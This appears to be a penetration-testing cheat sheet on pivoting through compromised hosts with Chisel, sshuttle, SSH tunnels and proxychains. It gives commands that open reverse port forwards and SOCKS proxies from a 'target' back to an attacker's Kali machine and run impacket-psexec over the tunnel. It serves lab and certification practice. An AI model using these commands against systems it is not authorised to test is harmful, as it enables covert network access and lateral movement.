Port Forwarding - Tunneling
Chisel
Portforwarding,
Forwarding remote port 8080 to localhost
On kali,
./chisel server --reverse --port 9001
example,
./chisel server --reverse --port 9001
On target,
.\chisel.exe client <kali-ip>:9001 R:<local-port>:127.0.0.1:<target-port>
example,
.\chisel.exe client 10.10.14.38:9001 R:8080:127.0.0.1:8080
Sock5 proxy with chisel,
On kali,
./chisel server -p 9001 --socks5 --reverse
On target,
chisel client <kali-ip>:9001 R:5000:socks
R:5000:socks
the
R
means that we want to perform a reverse port forward.5000
will be the port on the attacker machine that will act as the entry point to our SOCKS5 proxy; andsocks
simply means we are using the SOCKS protocol.
Add socks5 127.0.0.1 5000
to /etc/proxychains.conf
Don't forget to disable DNS resolution over proxychains.
udp port forward
/opt/chisel/chisel_1.7.7_linux_386 server --reverse --port 9001
./chisel_1.7.7_linux_386 client 192.168.119.203:9001 R:10.1.1.89:1978/udp
Sshuttle
This is the best tunneling tool
Standalone (compiled and ready to be executed) binaries,
sshuttle -vvv -e 'ssh -i id_rsa' -r [email protected] -x 10.11.1.252 10.2.2.1/24
sudo ./sshuttle -e "ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -c 3des-cbc" -r [email protected]:22000 10.2.2.1/24
SSH
Port forwarding,
forwards remote host 10.10.10.99:2049 back to localhost:2049
ssh -L 127.0.0.1:1978:10.10.10.99:1978 [email protected]
Tunneling,
ssh [email protected] -p22000 -D 127.0.0.1:1080
proxychains firefox
proxychains impacket-psexec [email protected]
Regeorg
Last updated